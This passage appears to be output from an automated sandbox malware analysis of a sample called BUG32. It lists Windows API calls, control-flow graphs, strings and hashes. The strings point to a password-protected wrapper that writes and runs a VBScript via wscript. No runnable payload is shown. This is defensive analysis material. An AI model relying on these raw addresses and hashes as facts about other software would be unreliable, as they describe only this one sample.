                              • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401067,00000000,00001000,00000000,00000000), ref: 0040A1C9
                              • Part of subcall function 00409881: LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00409892
                              • Part of subcall function 00409881: GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 004098A9
                              • Part of subcall function 00409881: GetVersionExA.KERNEL32(?), ref: 004098C9
                              • Part of subcall function 004088B0: LoadIconA.USER32(00000001,0000005C), ref: 004088EA
                              • Part of subcall function 004088B0: LoadCursorA.USER32(00000000,00007F00), ref: 004088FB
                              • Part of subcall function 00407AC1: InitializeCriticalSection.KERNEL32(00410694,?,?,?,00401080,00000000,00001000,00000000,00000000), ref: 00407ACB
                              • Part of subcall function 00407AC1: GetStockObject.GDI32(00000011), ref: 00407AD3
                              • Part of subcall function 00407AC1: memset.MSVCRT ref: 00407B0F
                              • Part of subcall function 00407AC1: InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 00407B29
                              • Part of subcall function 00407301: InitializeCriticalSection.KERNEL32(00410648,00000004,00000004,004072D4,00000010,00000000,00000000,0040108A,00000000,00001000,00000000,00000000), ref: 00407329
                              • Part of subcall function 00406F79: memset.MSVCRT ref: 00406F86
                              • Part of subcall function 00406F79: InitCommonControlsEx.COMCTL32(00000000,00001000), ref: 00406FA0
                              • Part of subcall function 00406F79: CoInitialize.OLE32(00000000), ref: 00406FA8
                              • Part of subcall function 004077A5: HeapFree.KERNEL32(00000000,?,?,?,00001000,?,?,?,0040109A,00000000,00001000,00000000,00000000), ref: 004077E3
                              • Part of subcall function 004077A5: HeapFree.KERNEL32(00000000,?,?,00001000,?,?,?,0040109A,00000000,00001000,00000000,00000000), ref: 004077FB
                              • Part of subcall function 004077A5: HeapFree.KERNEL32(00000000,00001000,?,00001000,?,?,?,0040109A,00000000,00001000,00000000,00000000), ref: 00407805
                              • Part of subcall function 004076F4: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010B5,00000008,00000000,0040F1F8,00000007,00000000,00001000,00000000,00000000), ref: 00407707
                              • Part of subcall function 004076F4: HeapAlloc.KERNEL32(00000007,00000008,?,?,?,004010B5,00000008,00000000,0040F1F8,00000007,00000000,00001000,00000000,00000000), ref: 0040771C
                              • Part of subcall function 0040CABD: RtlAllocateHeap.NTDLL(00000000,00000FE8,0040F1F8,?,?,?,?,004010D3,00000008,00000401,00000007,0040F208,00410350,00000008,00000000,0040F1F8), ref: 0040CAE0
                              • Part of subcall function 0040CABD: memset.MSVCRT ref: 0040CB17
                              • Part of subcall function 0040B0E2: HeapAlloc.KERNEL32(00000000,0000003C,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028,0040ABCA,0040ABE7), ref: 0040B102
                              • Part of subcall function 0040B0E2: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B12A
                              • Part of subcall function 0040B0E2: HeapAlloc.KERNEL32(00000008,00000000,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040B18F
                              • Part of subcall function 0040866F: GetVersionExA.KERNEL32(?), ref: 00408693
                              • Part of subcall function 0040866F: GetVersionExA.KERNEL32(00000008), ref: 004086C1
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401,00000007,0040F208,00410350), ref: 004011FA
                              • Part of subcall function 00406FB0: MessageBoxA.USER32(00000000,00000007,00001000,00000000), ref: 00406FCA
                            • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D32
                              • Part of subcall function 0040CE20: HeapFree.KERNEL32(026C0000,00000000,026C0780,?,00401D3C,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015), ref: 0040CE32
                              • Part of subcall function 0040CE20: HeapDestroy.KERNELBASE(026C0000,?,00401D3C,00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200), ref: 0040CE3F
                            • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D42
                            • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D47
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$Alloc$memset$CreateFreeInitialize$CriticalLoadSectionVersion$AllocateCommonControlsDestroyExitHandleInitMessageModuleProcessRegisterWindow$AddressClassCursorIconLibraryObjectProcStock
                            • String ID: *?$-v2epass$.vbs$2$An unknown error occured. The program will be terminated.$Cannot allocate the memory.$Choose a location to save the files.$Continue?$Couldn't create these files.$Error!$Password$Please enter the password.$This program is not supported on your operating system.$Wrong password.$\BDFINOPS$sysnative$v2eincfilecount$v2eincfilepath$v2eprogramname$v2eprogrampathname$v2eprogramshortname$wscript
                            • API String ID: 2482411553-3312744625
                            • Opcode ID: 41db0865d5aa2bd62edac567aa8b3dcc783a9d19bcfdadf501ab93de3fdaf0e9
                            • Instruction ID: 82e4e01fb3aade69122d7211e16f98ea397318bdcb3e7722f79fd335e3c5dab6
                            • Opcode Fuzzy Hash: 41db0865d5aa2bd62edac567aa8b3dcc783a9d19bcfdadf501ab93de3fdaf0e9
                            • Instruction Fuzzy Hash: 63524D71241204AFD750BBA1ED86BD93761AB84708F20C13EB6147A1F2CAF95CD19B5E

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 0040AC04
                            • RegisterClassA.USER32(?), ref: 0040AC3E
                            • CreateWindowExA.USER32(00000000,PostEventClass,00000000,00C00000,00000000,00000000,00000001,00000001,00000000,00000000,00000000), ref: 0040AC5B
                            • RegisterWindowMessageA.USER32(PB_PostEventMessage), ref: 0040AC6B
                              • Part of subcall function 0040C45A: HeapAlloc.KERNEL32(00000008,0040ABCA,00000000,0040AC87,00000028,0040ABCA,0040ABE7), ref: 0040C467
                              • Part of subcall function 0040B0E2: HeapAlloc.KERNEL32(00000000,0000003C,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028,0040ABCA,0040ABE7), ref: 0040B102
                              • Part of subcall function 0040B0E2: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B12A
                              • Part of subcall function 0040B0E2: HeapAlloc.KERNEL32(00000008,00000000,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040B18F
                            • InitializeCriticalSection.KERNEL32(00410764,00000000,004105D0,00000400,00000028,0040ABCA,0040ABE7), ref: 0040ACB4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$Alloc$RegisterWindow$AllocateClassCreateCriticalInitializeMessageSectionmemset
                            • String ID: PB_PostEventMessage$PostEventClass
                            • API String ID: 3870892101-297677326
                            • Opcode ID: b588f204dfea92e3aae8e4a9cd4b871418ff5e64253ff12f27820ff286976a2f
                            • Instruction ID: 1d6e0cece73cb659c051cf41e1a52d70cb3ec1ccd1cc0fbb66ecd8b4901951d4
                            • Opcode Fuzzy Hash: b588f204dfea92e3aae8e4a9cd4b871418ff5e64253ff12f27820ff286976a2f
                            • Instruction Fuzzy Hash: 67112C70951318BAD7209FA2AD09FDB7EB8EB05B54F10843AF604B61D0D7F95184CBA9

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040D090: HeapReAlloc.KERNEL32(026C0000,00000000,026C0780,000040FF,00000000,00000000), ref: 0040D0D7
                            • GetTempPathA.KERNEL32(00000104,00000000,00000104,00000007,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS), ref: 0040A57A
                            • LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000,00000008), ref: 0040A587
                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0040A599
                            • GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000), ref: 0040A5A6
                            • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00402412,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000,00000008), ref: 0040A5AB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTemp
                            • String ID: GetLongPathNameA$Kernel32.DLL
                            • API String ID: 3547342574-822094646
                            • Opcode ID: 7e68b1039b543467b10e03b0ee8ef905fae84d7ebba801e9ae1d3e9132126be3
                            • Instruction ID: 7ffc584653461ef01a92a163b16c72b9ce0105276b2cf6b7e82a2137a9ba165d
                            • Opcode Fuzzy Hash: 7e68b1039b543467b10e03b0ee8ef905fae84d7ebba801e9ae1d3e9132126be3
                            • Instruction Fuzzy Hash: 62F082322026547FD2312BB69D4CF6B3E9CEF96755B00083AF905B2291DA7E5C16C2BD

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 450 40b0e2-40b108 call 40b1da HeapAlloc 453 40b10e-40b112 450->453 454 40b1af-40b1b5 450->454 455 40b114 453->455 456 40b11b-40b133 RtlAllocateHeap 453->456 455->456 457 40b135-40b163 call 40d27c 456->457 458 40b19f-40b1ad HeapFree 456->458 461 40b165 457->461 462 40b169-40b19d call 40c495 HeapAlloc 457->462 458->454 461->462 462->454
                            APIs
                              • Part of subcall function 0040B1DA: HeapFree.KERNEL32(00000000,?,?,00000028,PostEventClass,00000000,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B205
                              • Part of subcall function 0040B1DA: HeapFree.KERNEL32(00000000,?,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040B211
                              • Part of subcall function 0040B1DA: HeapFree.KERNEL32(00000000,?,004105D0,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400), ref: 0040B225
                              • Part of subcall function 0040B1DA: HeapFree.KERNEL32(00000000,00000028,?,0040B0F2,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028), ref: 0040B23B
                            • HeapAlloc.KERNEL32(00000000,0000003C,004105D0,PostEventClass,00000000,?,?,0040ACA0,00000008,00000007,00000000,004105D0,00000400,00000028,0040ABCA,0040ABE7), ref: 0040B102
                            • RtlAllocateHeap.NTDLL(00000008,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B12A
                            • HeapAlloc.KERNEL32(00000008,00000000,0040ABC2,00000010,00010000,00000004,00000400,?,?,0040ACA0,00000008,00000007), ref: 0040B18F
                            • HeapFree.KERNEL32(00000000,00000000,?,?,0040ACA0,00000008,00000007), ref: 0040B1A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$Free$Alloc$Allocate
                            • String ID: 4@$PostEventClass
                            • API String ID: 2693377920-1323450605
                            • Opcode ID: ccf9d07d8a3f429be7826d2f91c68a225d7cb8266e7da9630454040cb9a3e697
                            • Instruction ID: 64c63dd00d404ad4d41a38edb8a7f0e8ebd03068981b9df2e77a1d5a6a5c8fa7
                            • Opcode Fuzzy Hash: ccf9d07d8a3f429be7826d2f91c68a225d7cb8266e7da9630454040cb9a3e697
                            • Instruction Fuzzy Hash: FE2108B1500714AFD7609F29DC45B46BBE4FB18790F00853EF949EA6A0D3B4E8518F98

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 505 40251c-40251e 506 402523-40252e 505->506 506->506 507 402530-402584 call 404060 call 40a3d5 call 40a395 call 404420 call 40ce50 506->507 517 402589-4025bc call 4044c0 call 40ce50 call 40ced0 507->517 524 402851-402883 517->524 525 4025c2-4025d4 517->525 529 40288b-402893 524->529 526 402601-402638 call 40cf00 call 40ce50 call 404720 525->526 527 4025d6-4025fc call 4045d0 525->527 539 40284f-40286f call 40cc35 526->539 552 40263e-40266c call 404068 * 2 call 404780 526->552 527->539 533 402ac0-402b12 call 404a50 call 404200 call 4040d0 529->533 534 402899-4028c9 call 40cf00 call 40ce50 529->534 561 402b18-402b88 call 40cf00 * 5 call 406fb0 533->561 562 402baf-402c04 call 40cf60 * 8 533->562 554 402955-402965 call 40a8a0 534->554 555 4028cf-4028df call 40a970 534->555 548 402874 539->548 548->517 592 402674-40267d 552->592 569 402a51-402a88 call 404800 call 40ced0 554->569 570 40296b-4029b4 call 40cf00 call 404390 call 4074ad 554->570 555->554 568 4028e1-402922 call 40a680 call 404800 call 40ced0 555->568 561->562 643 402b8a-402ba5 call 402ffb call 40a48b RemoveDirectoryA 561->643 609 402950 568->609 610 402924-40294b call 40cf00 * 3 call 40ce50 568->610 598 402ab6-402aba 569->598 599 402a8a-402ab1 call 40cf00 * 3 call 40ce50 569->599 604 4029b9-402a4f call 40aa20 call 40a680 call 40780d call 40cf00 call 40ce50 call 40b9c0 570->604 592->539 600 402683-402692 call 40ced0 592->600 598->529 598->533 599->598 615 402694-4026a8 call 40cf00 call 40ce50 600->615 616 4026ad-402711 call 4044c0 call 40ce50 call 40cf00 * 4 call 40a5c4 600->616 604->598 609->598 610->609 615->616 674 402716-402798 call 40cf00 * 3 call 40ce50 call 40cf00 * 4 call 40b1b8 616->674 643->562 693 402845-402849 674->693 694 40279e-402841 call 40cf00 * 4 call 40b1b8 call 40780d call 40cf00 * 4 call 40ce50 674->694 693->539 693->592 694->693
                            APIs
                              • Part of subcall function 0040CF00: strlen.MSVCRT ref: 0040CF13
                              • Part of subcall function 0040CE50: RtlAllocateHeap.NTDLL(026C0000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000,00000000), ref: 0040CE76
                              • Part of subcall function 004044C0: strncmp.MSVCRT(?,?,?,?,?,00000000,?,?,004025A7,?,?,0040F021,?,\BDFINOPS), ref: 00404515
                              • Part of subcall function 0040CE50: HeapReAlloc.KERNEL32(026C0000,00000000,00000000,-00000005,?,?,0040241C,00000000,00000400,00000000,00000000,00000000,00000000,0040130D,OPS,00000000), ref: 0040CE99
                              • Part of subcall function 0040A5C4: strncpy.MSVCRT ref: 0040A5E2
                              • Part of subcall function 0040A5C4: strlen.MSVCRT ref: 0040A5F2
                              • Part of subcall function 0040A5C4: CreateDirectoryA.KERNELBASE(?,00000000), ref: 0040A62C
                              • Part of subcall function 0040A8A0: CreateFileA.KERNELBASE(0040F1F8,C0000000,00000001,00000000,00000002,00000080,00000000,00C41950,00000000,?,?,?,00000000,00401967,00000001,004102FC), ref: 0040A8D4
                              • Part of subcall function 0040A8A0: CreateFileA.KERNELBASE(0040F1F8,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401967,00000001,004102FC,.vbs,0040F01E), ref: 0040A8ED
                              • Part of subcall function 0040A8A0: HeapAlloc.KERNEL32(00C40000,00000000,00001000,?,?,?,00000000,00401967,00000001,004102FC,.vbs,0040F01E,00000000,004102C4,00000800,00000000), ref: 0040A90E
                            • RemoveDirectoryA.KERNEL32(00000024,?,0040F18B,?,?,?,?,?,?,?,0040F021,?,\BDFINOPS), ref: 00402BA0
                              • Part of subcall function 0040780D: memset.MSVCRT ref: 0040782D
                              • Part of subcall function 0040CF60: HeapFree.KERNEL32(026C0000,00000000,00000000,00000004,?,?,0040D77F,?,00000000,-00000008,0040ABCA,04244C8B,?,?,0040B554,00000000), ref: 0040CF78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: Heap$Create$AllocDirectoryFilestrlen$AllocateFreeRemovememsetstrncmpstrncpy
                            • String ID: $\BDFINOPS$v2eincfile
                            • API String ID: 4280069899-3860558671
                            • Opcode ID: f473dce518ec885a4d2a9de06bb921c6f3387920b57a880a8d28f0869de1d23b
                            • Instruction ID: 4f7668c59bda7e9e66517d9e854986fb431ad9595be2f9c4fa7ada6fbf7aea15
                            • Opcode Fuzzy Hash: f473dce518ec885a4d2a9de06bb921c6f3387920b57a880a8d28f0869de1d23b
                            • Instruction Fuzzy Hash: A2F13D71104301EFC740FF51DD81A8A77A2FB88708F108A3EF654661E6CB799896DB9E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 717 40aa80-40aa93 718 40aab5-40aabe 717->718 719 40aa95-40aab2 SetFilePointer 717->719 720 40aac0-40aacb 718->720 721 40ab2a-40ab35 call 40a640 718->721 719->718 723 40ab17-40ab27 720->723 724 40aacd-40aace 720->724 728 40ab57-40ab76 memcpy 721->728 729 40ab37-40ab54 WriteFile 721->729 726 40aad0-40aad3 724->726 727 40ab02-40ab14 724->727 730 40aad5-40aaec memcpy 726->730 731 40aaef-40aaff 726->731
                            APIs
                            • SetFilePointer.KERNELBASE(?,?,00000000,00000001,00000000,0040F1F8,?,0040AA5C,00000000,00000000,0040F1F8,00C41950,00000000), ref: 0040AAA2
                            • memcpy.MSVCRT ref: 0040AADC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: FilePointermemcpy
                            • String ID:
                            • API String ID: 1104741977-0
                            • Opcode ID: a185da91319dec254dd32dda2610abe8d67f68d92e1d2a64ef7b01e7668fdd99
                            • Instruction ID: a9444c1e4bc10177ab18cc121d8618cd676252384f014d45b74d2bb9c7a8f242
                            • Opcode Fuzzy Hash: a185da91319dec254dd32dda2610abe8d67f68d92e1d2a64ef7b01e7668fdd99
                            • Instruction Fuzzy Hash: A1318A763007019FC224DF1AE444E5BF7EAEFD0321F14C92EE69693B90C634A848CB62

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 732 401562 733 4015f5-4015f6 call 408de7 732->733 737 401567-40156f 733->737 738 40154d-40155d RemoveDirectoryA 733->738 740 401571-40157f call 40acbc 737->740 741 4015af-4015b7 737->741 739 401d32-401d47 ExitProcess call 40ce20 HeapDestroy ExitProcess 738->739 749 401581-4015aa call 4082e4 call 40ce50 call 408783 740->749 750 4015ac-4015ad 740->750 741->733 744 4015b9-4015c7 call 40accb 741->744 751 4015f4 744->751 752 4015c9-4015f2 call 4082e4 call 40ce50 call 408783 744->752 765 4015fb-401652 call 4040d0 call 40b6a0 call 40a1f0 call 40ced0 749->765 750->733 751->733 752->765 774 401654-40167a call 406fb0 RemoveDirectoryA 765->774 775 40167f-401691 call 402c3b 765->775 774->739 780 401693-401698 775->780 781 40169d-40170d call 402d4e call 40a1f0 call 40ce50 call 402c3b 775->781 780->781 790 401713-40175d call 4073f1 call 40a1f0 call 40ced0 781->790 791 40188a-401969 call 40cf00 * 3 call 40ce50 call 404100 call 40ce50 call 40cf00 * 2 GetTempFileNameA call 40a48b PathRenameExtensionA call 40cf00 call 40ce50 call 40a8a0 781->791 805 401771 790->805 806 40175f-401768 790->806 849 40196b-4019d5 call 40aa20 call 40a680 call 40ced0 791->849 850 40198d-4019c3 call 40a48b call 402ffb call 406fb0 RemoveDirectoryA 791->850 809 401773-401775 805->809 806->805 808 40176a-40176f 806->808 808->809 809->791 811 40177b-4017c2 call 40a395 call 407023 call 40ce50 call 40ced0 809->811 829 4017c4-4017f7 call 40cf00 call 40ce50 call 40a3d5 call 40ced0 811->829 830 401838-401885 call 407452 call 40a3e7 call 40a3d5 RemoveDirectoryA 811->830 856 401804-401816 call 40a8a0 829->856 857 4017f9-4017ff call 40251c 829->857 830->739 875 4019e2-401b91 call 404100 call 40ce50 call 407452 GetShortPathNameA call 407452 call 4074ad call 407452 call 40a541 call 4074ad call 407452 call 40a3e7 call 4074ad call 404200 call 4074ad * 2 call 404390 call 4074ad PathQuoteSpacesA call 402c07 849->875 876 4019d7-4019dd call 40251c 849->876 850->739 856->830 867 401818-401833 call 40aa20 call 40a680 856->867 857->856 867->830 912 401b93-401b9d call 40866f 875->912 913 401ba6 875->913 876->875 912->913 919 401b9f-401ba4 912->919 914 401ba8-401baa 913->914 916 401c15-401c47 call 404100 call 40ce50 GetSystemDirectoryA PathAddBackslashA 914->916 917 401bac-401c13 call 404100 call 40ce50 GetWindowsDirectoryA PathAddBackslashA call 40cf00 * 2 call 40ce50 PathAddBackslashA 914->917 928 401c4c-401d2b call 40cf00 * 5 call 40230c call 402ffb PathUnquoteSpacesA call 40a48b call 407452 call 40a3e7 call 40a3d5 RemoveDirectoryA 916->928 917->928 919->914 928->739
                            APIs
                            • RemoveDirectoryA.KERNEL32(00000000,00000002,00000000,0000000D,00000004,00000003,0000003D,0000004B,0000004E,00000014,0040F1CE,00000002,00000015,00000028,0000009E,00000014), ref: 00401553
                            • RemoveDirectoryA.KERNEL32(00000010,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401670
                            • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D32
                            • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D42
                            • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000008,00000000,0040F200,00000007,00000004,00000015,00000000,00000200,00000200,00000008,00000401), ref: 00401D47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2052013413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.2051977337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052051403.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052089640.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052125385.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052709995.000000000070F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2052740544.0000000000710000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_BUG32.jbxd
                            Similarity
                            • API ID: DirectoryExitProcessRemove$DestroyHeap
                            • String ID:
                            • API String ID: 3087781131-0
                            • Opcode ID: 69f7cdbf409a39955eeee48d453964b31c3bff982f6b5e090b565320cb2aa0ac
                            • Instruction ID: c182ab679dd46b7806b9494677c5555ebd4facc2d44e5decccdeeaaa85f96ece
                            • Opcode Fuzzy Hash: 69f7cdbf409a39955eeee48d453964b31c3bff982f6b5e090b565320cb2aa0ac
                            • Instruction Fuzzy Hash: 88E01AB0014204A6C55177F7AC83B1C21655F8435CFA4493FF2C2790E38C7D26A1643F

                            Control-flow Graph

                            • Executed
                            • Not Executed
